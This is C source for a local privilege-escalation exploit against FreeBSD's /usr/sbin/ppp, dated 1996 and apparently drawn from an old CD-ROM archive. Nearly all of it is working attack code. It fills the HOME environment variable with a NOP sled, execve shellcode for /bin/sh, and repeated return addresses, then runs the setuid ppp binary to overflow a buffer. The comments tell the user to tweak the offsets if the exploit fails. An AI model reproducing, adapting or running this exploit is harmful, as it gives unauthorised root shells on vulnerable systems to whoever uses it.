home *** CD-ROM | disk | FTP | other *** search
- /*
- * Exploitation script for the ppp vulnerbility as described by
- * no one to date, this is NOT FreeBSD-SA-96:15. Works on
- * FreeBSD as tested. Mess with the numbers if it doesnt work.
- *
- * --Nirva 8/4/96
- */
-
- #include <stdio.h>
- #include <stdlib.h>
- #include <unistd.h>
-
- #define BUFFER_SIZE 156 /* size of the bufer to overflow */
-
- #define OFFSET -290 /* number of bytes to jump after the start
- of the buffer */
-
- long get_esp(void) { __asm__("movl %esp,%eax\n"); }
-
- main(int argc, char *argv[])
- {
- char *buf = NULL;
- unsigned long *addr_ptr = NULL;
- char *ptr = NULL;
- char execshell[] =
- "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" /* 16 bytes */
- "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" /* 16 bytes */
- "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" /* 20 bytes */
- "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; /* 15 bytes, 57 total */
-
- int i,j;
-
- buf = malloc(4096);
-
- /* fill start of bufer with nops */
-
- i = BUFFER_SIZE-strlen(execshell);
-
- memset(buf, 0x90, i);
- ptr = buf + i;
-
- /* place exploit code into the buffer */
-
- for(i = 0; i < strlen(execshell); i++)
- *ptr++ = execshell[i];
-
- addr_ptr = (long *)ptr;
- for(i=0;i < (104/4); i++)
- *addr_ptr++ = get_esp() + OFFSET;
-
- ptr = (char *)addr_ptr;
- *ptr = 0;
-
- setenv("HOME", buf, 1);
-
- execl("/usr/sbin/ppp", "ppp", NULL);
- }
-
-
-
